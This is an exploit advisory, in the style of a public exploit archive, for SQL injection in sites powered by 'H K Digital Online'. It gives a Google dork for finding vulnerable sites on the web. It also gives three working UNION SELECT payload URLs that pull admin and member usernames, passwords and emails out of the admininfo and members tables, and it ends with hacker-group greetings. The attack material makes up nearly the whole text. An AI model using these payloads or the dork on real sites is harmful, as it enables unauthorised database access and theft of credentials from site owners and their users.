# Exploit Author:Th3 R0cksT3r
# Exploit Title: H K Digital Online SQL Injection
# Date: 15.02.2014
# Email: th3rockst3r@gmail.com 
# Vendor Homepage: http://www.hkdigitalonline.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:".php?id=" intext:"Powered by H K Digital Online."




=== Material's Description ===
An attacker can get database info by this vulnerablity.



Proof Of Concept:


1. http://localhost/tender_notice.php?id=-23%27+UNION+SELECT+1,2,3,group_concat%28userid,0x3a,password,0x3a,mainadmin%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo--+

2. http://localhost/blog-inner.php?id=-3%27+UNION+SELECT+1,2,3,4,group_concat%28userid,0x3a,password,0x3a,email%29,6,7,8,9,10,11,12+from+admininfo--+

3. http://localhost/storelocator.php?id=-574+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat%28login,0x3a,passwd,0x3a,email%29,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+members--




# Greetz:Back Bone,Illûmïnåté Ðëmøñ,Orions Hunter,Dark Knight Sparda,Gh0st KilL3r,Luge Racer,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,
Sparrow,Bd Matrix,Cyber Blader,BD BLACK HAT and All Bangladeshi Hackers